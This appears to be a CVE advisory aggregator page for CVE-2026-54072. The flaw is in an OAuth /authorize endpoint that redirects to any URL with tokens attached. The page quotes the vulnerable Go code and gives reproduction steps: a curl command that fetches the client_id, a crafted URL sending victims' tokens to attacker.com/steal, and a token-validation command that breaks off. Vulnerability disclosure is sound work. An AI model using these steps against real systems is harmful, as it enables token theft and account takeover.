CSIRTS // UNIFIED SECURITY ADVISORY FEEDSYS ● ONLINE · POWERED BY INTELFUSIONS.COM

CVE-2026-54072

criticalCVSS 9.3covered by 1 sourcefirst seen 2026-07-10
Summary The /authorize endpoint accepts any redirect_uri without validating it against AllowedOrigins. When response_type=token or response_type=id_token, the server appends access_token, id_token, and refresh_token as query parameters and issues a 302 redirect to the attacker-supplied URL. An unauthenticated attacker can obtain the required client_id from the public /graphql?query={meta{client_id}} endpoint. Partial fix was applied in v2.0.1 to other handlers (oauth_login, verify_email, magic_link_login, forgot_password, invite_members, oauth_callback) but /authorize was not included. Vulnerable Code internal/http_handlers/authorize.go: redirectURI := strings.TrimSpace(gc.Query("redirect_uri")) // ... no IsValidOrigin() call ... // response_type=token path (line ~263): if strings.Contains(redirectURI, "?") { redirectURI = redirectURI + "&" + params } else { redirectURI = redirectURI + "?" + params } handleResponse(gc, responseMode, authURL, redirectURI, ...) // 302 to attacker URL Compare with the fixed oauth_login.go in v2.0.1 which calls validators.IsValidOrigin(redirectURI, h.Config.AllowedOrigins). Steps to Reproduce 1. Obtain client_id (no authentication required) CLIENT_ID=$(curl -s http://TARGET/graphql \ -H "Content-Type: application/json" \ -d '{"query":"{meta{client_id}}"}' | python3 -c "import sys,json; print(json.load(sys.stdin)['data']['meta']['client_id'])") echo "client_id: $CLIENT_ID" 2. Craft the malicious URL and send to victim (victim must be logged in) When victim opens this URL, tokens are delivered to attacker.com MALICIOUS_URL="http://TARGET/authorize?response_type=token&client_id=${CLIENT_ID}&redirect_uri=https://attacker.com/steal&scope=openid+profile+email&state=x&response_mode=query" echo "Send to victim: $MALICIOUS_URL" 3. Attacker receives 302 redirect with all tokens: https://attacker.com/steal?access_token=eyJ...&token_type=bearer&expires_in=...&id_token=eyJ... 4. Validate stolen token curl -s http://TARGET/userinfo \ -H

⚡ Watch CVE-2026-54072

Get an email if CVE-2026-54072 is added to CISA KEV, gains public exploit code, or a new advisory cites it — max one per day, one-click unsubscribe.

Advisory coverage (1)

External references

NVD record for CVE-2026-54072

CVE.org record

Embed the live status

CVE-2026-54072 live status badge — this badge updates automatically when the KEV or exploit status changes. How to embed it →

[![CVE-2026-54072 status](https://www.csirts.com/badge/CVE-2026-54072)](https://www.csirts.com/cve/CVE-2026-54072)